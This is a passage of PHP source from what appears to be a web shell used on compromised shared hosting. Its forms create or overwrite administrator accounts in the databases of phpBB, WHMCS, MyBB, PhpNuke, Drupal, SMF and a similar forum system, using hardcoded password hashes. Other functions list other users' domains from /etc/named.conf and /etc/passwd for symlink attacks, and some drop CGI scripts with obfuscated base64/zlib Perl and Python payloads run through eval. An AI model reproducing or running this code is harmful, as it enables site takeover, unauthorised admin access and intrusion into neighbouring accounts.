 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
				

				

				

				
 'td3' =>
				

				

				

				
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
				

				

				

				
 'td4' =>
				

				

				

				
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
				

				

				

				
 'td5' =>
				

				

				

				
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
				

				

				

				
 'td6' =>
				

				

				

				
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
				

				

				

				
 'td7' =>
				

				

				

				
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
				

				

				

				
 'td8' =>
				

				

				

				
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
				

				

				

				
);
				

				

				

				
create_table($table);
				

				

				

				
echo '
				

				


				

					

					
					
 

				
 

			
 
';
	

	

	

	
if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
	

	

	

	
$localhost = $_POST['alfa2'];
	

	

	

	
$database = $_POST['alfa3'];
	

	

	

	
$username = $_POST['alfa5'];
	

	

	

	
$password = $_POST['alfa6'];
	

	

	

	
$prefix = $_POST['alfa7'];
	

	

	

	
$admin = $_POST['alfa8'];
	

	

	

	
$SQL = $_POST['alfa9'];
	

	

	

	
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_connect_error());
	

	

	

	
$pw_col = @mysqli_connect("SELECT column_name FROM information_schema.columns where table_name = '{$prefix}user' and column_name = 'password' and table_schema = '{$database}'");
	

	

	

	
$pw_col = @mysqli_num_rows($pw_col);
	

	

	

	
$adm_perm = "16744444";
	

	

	

	
if($pw_col > 0){
	

	

	

	
$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*','$SQL','".date('Y-m-d')."','".time()."','blowfish:10','1984-05-20')") or die(mysqli_error($conn));
	

	

	

	
}
	

	

	

	
$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
	

	

	

	
$sole = mysqli_num_rows($solevisible);
	

	

	

	
if($sole == 1){
	

	

	

	
$solevis = mysqli_fetch_assoc($solevisible);
	

	

	

	
$res = $solevis['userid'];
	

	

	

	
}
	

	

	

	
$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','".$adm_perm."')") or die(mysqli_error($conn));
	

	

	

	
if($solevisible){
	

	

	

	
__alert('Success... '.$admin.' is created...');}
	

	

	

	
}
	

	

	

	
}
	

	

	

	
if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){
	

	

	

	

	

	

	

	
echo __pre().'
	

	
| phpBB |

	

	


	

		

		

		
 

	

	


	
'.getConfigHtml('phpbb').'

	

	
';
		

		

		

		
$table = array('td1' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
		

		

		

		
 'td2' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td3' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td4' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td5' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td6' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
		

		

		

		
 'td7' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
		

		

		

		
 'td8' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
		

		

		

		
);
		

		

		

		
create_table($table);
		

		

		

		
echo '
		

		


		

			

			
			
 

		
 
';
	

	

	

	
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
	

	

	

	
$localhost = $_POST['alfa2'];
	

	

	

	
$database = $_POST['alfa3'];
	

	

	

	
$username = $_POST['alfa4'];
	

	

	

	
$password = $_POST['alfa6'];
	

	

	

	
$admin = $_POST['alfa8'];
	

	

	

	
$SQL = $_POST['alfa9'];
	

	

	

	
$prefix = $_POST['alfa10'];
	

	

	

	
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
	

	

	

	
$hash = md5('solevisible');
	

	

	

	
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
	

	

	

	
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
	

	

	

	
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
	

	

	

	
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
	

	

	

	
$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
	

	

	

	
if($solevisible){
	

	

	

	
__alert('Success... '.$admin.' is created...');
	

	

	

	
}
	

	

	

	
}
	

	

	

	
}
	

	

	

	
if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){
	

	

	

	

	

	

	

	
echo __pre().'
	

	
| Whmcs |

	

	


	

		

		

		
 

	

	


	
'.getConfigHtml('whmcs').'

	

	
';
		

		

		

		
$table = array('td1' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
		

		

		

		
 'td2' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td3' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td4' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td6' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
		

		

		

		
 'td7' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
		

		

		

		
 'td8' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
		

		

		

		
);
		

		

		

		
create_table($table);
		

		

		

		
echo '
		

		


		

			

			
			
 

		
 
';
	

	

	

	
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
	

	

	

	
$localhost = $_POST['alfa2'];
	

	

	

	
$database = $_POST['alfa3'];
	

	

	

	
$username = $_POST['alfa4'];
	

	

	

	
$password = $_POST['alfa5'];
	

	

	

	
$admin = $_POST['alfa8'];
	

	

	

	
$SQL = $_POST['alfa9'];
	

	

	

	
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
	

	

	

	
$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
	

	

	

	
if($solevisible){
	

	

	

	
__alert('Success... '.$admin.' is created...');}
	

	

	

	
}
	

	

	

	
}
	

	

	

	
if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){
	

	

	

	

	

	

	

	
echo __pre().'
	

	
| Mybb |

	

	


	

		

		

		
 

	

	


	
'.getConfigHtml('mybb').'

	

	
';
		

		

		

		
$table = array('td1' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
		

		

		

		
 'td2' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td3' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td4' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td5' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td6' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
		

		

		

		
 'td7' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
		

		

		

		
 'td8' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
		

		

		

		
);
		

		

		

		
create_table($table);
		

		

		

		
echo '
		

		


		

			

			
			
 

		
 
';
	

	

	

	
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
	

	

	

	
$localhost = $_POST['alfa2'];
	

	

	

	
$database = $_POST['alfa3'];
	

	

	

	
$username = $_POST['alfa4'];
	

	

	

	
$password = $_POST['alfa5'];
	

	

	

	
$admin = $_POST['alfa8'];
	

	

	

	
$SQL = $_POST['alfa9'];
	

	

	

	
$prefix = $_POST['alfa10'];
	

	

	

	
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
	

	

	

	
$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
	

	

	

	
if($solevisible){
	

	

	

	
__alert('Success... '.$admin.' is created...');}
	

	

	

	
}
	

	

	

	
}
	

	

	

	
if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){
	

	

	

	

	

	

	

	
echo __pre().'
	

	
| PhpNuke |

	

	


	

		

		

		
 

	

	


	
'.getConfigHtml('phpnuke').'

	

	
';
		

		

		

		
$table = array('td1' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
		

		

		

		
 'td2' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td3' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td4' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td5' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td6' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
		

		

		

		
 'td7' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
		

		

		

		
 'td8' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
		

		

		

		
);
		

		

		

		
create_table($table);
		

		

		

		
echo '
		

		


		

			

			
			
 

		
 
';
	

	

	

	
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
	

	

	

	
$localhost = $_POST['alfa2'];
	

	

	

	
$database = $_POST['alfa3'];
	

	

	

	
$username = $_POST['alfa4'];
	

	

	

	
$password = $_POST['alfa5'];
	

	

	

	
$admin = $_POST['alfa7'];
	

	

	

	
$SQL = $_POST['alfa9'];
	

	

	

	
$prefix = $_POST['alfa10'];
	

	

	

	
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
	

	

	

	
$hash = md5($pwd);
	

	

	

	
$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
	

	

	

	
if($solevisible){
	

	

	

	
__alert('Success... '.$admin.' is created...');}
	

	

	

	
}
	

	

	

	
}
	

	

	

	
if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){
	

	

	

	

	

	

	

	
echo __pre().'
	

	
| Drupal |

	

	


	

		

		

		
 

	

	


	
'.getConfigHtml('drupal').'

	

	
';
		

		

		

		
$table = array('td1' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
		

		

		

		
 'td2' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td3' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td4' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td6' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
		

		

		

		
 'td7' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
		

		

		

		
 );
		

		

		

		
create_table($table);
		

		

		

		
echo '
		

		


		

			

			
			
 

		
 
';
	

	

	

	
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
	

	

	

	
$localhost = $_POST['alfa2'];
	

	

	

	
$database = $_POST['alfa4'];
	

	

	

	
$username = $_POST['alfa5'];
	

	

	

	
$password = $_POST['alfa6'];
	

	

	

	
$admin = $_POST['alfa8'];
	

	

	

	
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
	

	

	

	
$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
	

	

	

	
$getDescuid = @mysqli_fetch_assoc($getDescuid);
	

	

	

	
$getDescuid = $getDescuid['uid'];
	

	

	

	
$getdescuid = $getDescuid++;
	

	

	

	
$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
	

	

	

	
$solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
	

	

	

	
$sole = mysqli_num_rows($solevisible);
	

	

	

	
if ($sole == 1){
	

	

	

	
$solevis = mysqli_fetch_assoc($solevisible);
	

	

	

	
$res = $solevis['uid'];
	

	

	

	
}
	

	

	

	
$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
	

	

	

	
if($solevisible){
	

	

	

	
__alert('Success... '.$admin.' is created...');}
	

	

	

	
}
	

	

	

	
}
	

	

	

	

	

	

	

	
if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){
	

	

	

	

	

	

	

	
echo __pre().'
	

	
| SMF |

	

	


	

		

		

		
 

	

	


	
'.getConfigHtml('smf').'

	

	
';
		

		

		

		
$table = array('td1' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
		

		

		

		
 'td2' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td3' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td4' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td5' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
		

		

		

		
 'td6' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
		

		

		

		
 'td7' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
		

		

		

		
 );
		

		

		

		
create_table($table);
		

		

		

		
echo '
		

		


		

			

			
			
 

		
 
';
	

	

	

	
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
	

	

	

	
$localhost = $_POST['alfa2'];
	

	

	

	
$database = $_POST['alfa3'];
	

	

	

	
$username = $_POST['alfa5'];
	

	

	

	
$password = $_POST['alfa6'];
	

	

	

	
$prefix = $_POST['alfa7'];
	

	

	

	
$admin = $_POST['alfa8'];
	

	

	

	
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
	

	

	

	
$setpwAlg = sha1(strtolower($admin) . 'solevisible');
	

	

	

	
$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
	

	

	

	
if($solevisible){
	

	

	

	
__alert('Success... '.$admin.' is created...');}
	

	

	

	
}
	

	

	

	
}
	

	

	

	
echo "
";







alfafooter();







}







function alfaMakePwd(){







 if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){







 return "/home/{user}/public_html/";







 }







 $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);







 $public = end($document);







 array_pop($document);







 array_pop($document);







 $path = implode("/", $document) . "/{user}/" . $public;







 return $path;







}







function alfaGetDomains($state = false){







 $state = "named.conf";







 $lines = array();







 $lines = _alfa_file('/etc/named.conf');







 if(!$lines){







 $lines = @scandir("/etc/valiases/");







 $state = "valiases";







 if(!$lines){







 $lines = @scandir("/var/named");







 $state = "named";







 if(!$lines && $state){







 $lines = _alfa_file('/etc/passwd');







 $state = "passwd";







 }







 }







 }







 return array("lines" => $lines, "state" => $state);







}







function alfaCreateParentFolder(){







 $parent = $GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__;







 if(!@is_dir($parent)){







 @mkdir($parent, 0755, true);







 }







}







function alfasymlink(){







alfahead();







AlfaNum(9,10);







alfaCreateParentFolder();







@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);







echo '




	

	

	

	
| Symlink |

	

	


	
| Symlink( php ) | | Symlink( perl ) | | Symlink( python ) | | File Symlink | 
';
	

	

	

	
if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
	

	

	

	
 $sympath = alfaMakePwd();
	

	

	

	
 @mkdir('cgialfa',0755);
	

	

	

	
 @chdir('cgialfa');
	

	

	

	
 alfacgihtaccess('cgi');
	

	

	

	
 $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;my $alfa_data="'.__ALFA_DATA_FOLDER__.'";eval(Compress::Zlib::memGunzip(decode_base64("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")));';
	

	

	

	
 $py = '#!/usr/bin/python'."\nimport zlib, base64\nalfa_data='".__ALFA_DATA_FOLDER__."'\n".'eval(compile(zlib.decompress(base64.b64decode("eJydWN1z4jgSfzZ/hdZTWcOG2JC6vQdC2MrNTO6manfn6ib7lFAuYQvwjrFckgiwU3N/+3XrwxbgZKbOD1iW+lvdP7VQ4jDpEXiKTc2FItmqUAs9oUcxq+iiZP1Bj+0zVqtJL6iplL2eJVfFhrkxl24kD81QNMv1Lu/1ViVf0DKFMbklYei+t6I03x8+pW//+QHG97SUrKecdUd8ID6mYvX8OJ77i0aIVKJPyyVNc6rogFySMAFPcCYJGyeQq1H1ILas18vZkqyYQhX9mssBeFosGyJrEEwGgqmtqDyLNCGwIFWYF4JlKiRckD6XcU3VOi7ksoAYhglTWVLRDcvjjFfLcEBolZOWCngt0TMtCyqZTMLBwNMZJmu+YcmXrWTia1JvF2WRpWu1KcG1ALjBBBTHqudC8OoxfPfx7R+/vf/9If3Px48P4TyWdVkoUBEOYBs1NzAgX1zzGvY48MdO54V0Ci9kSC4I8sd/8qLqI/VgSIykgQnhhn5msAMZ31ZqSHK+oUU1JMg/JNkuR2/WStW42/ieJEl4iVtmKAc6lmasw/n4Cz7zEINg+aI/6TOVmShgI2nJBDi0YySjlSLLAuJpuOM4DgcRuCkKWAinSkBmHEp2Gym2V1cQ31U1yVilmLiJZlOVz6ZLDpQZL7m4jd7cwzMaRzNjnXZncBlOEySaTROkV3mHyJItFQqkZC3Y8jYy/Gg6sEdEQd4ydRuli5JWn6MTpaPR3fX1yCm1IfG00kZzh7X3944Ro31u7KlNbdUALdaHPGzKovqc4Lg+2K9Y7ZWNAezeZZh8ywcIGzzR7JPhP7M9UWIG2aqTJeepVeNKbnOwNe6XYi+A3U0Fo3mqq8fVbFDIFDJdbWnZTD1T0RAZDAlMHPmuYrpA7CwTAmq0+XQ8j/NeAAYxacf5At3MPpeFVHbKq3bNpZPzyBQr89xst6BxLQgaTbxmVQc+xMisabAgA4Ne5L1+FbzSIpyoVpaM0dhOMEHCTimtmG45EFZjmZERHMXZRP5F0U2oDR0rz+Fy8npMbGQTfyfPonO6z9aq14PmXDgPmlX5Wsw699wPZSP9u7b3xfi9mEYnkYW46glkO0nvQAechHh47/LwJng94JbsuxLwZRss9toSJ+9xHnEZc8CcpQ06Y5NBFlzkDDBkHDlgXUDlrQSAb36l8WXyZqSfmw1gUFFNRoRuFdcAvgZLZ/83zP90BpadwPxOp5h8ndiB8R8Aw98k7QZLB5TwY/1a8PyAuBnsIdRjeC8h6LgzBE5KvUPNXgIBvmIA7aI2mUXzXDAp7QrO6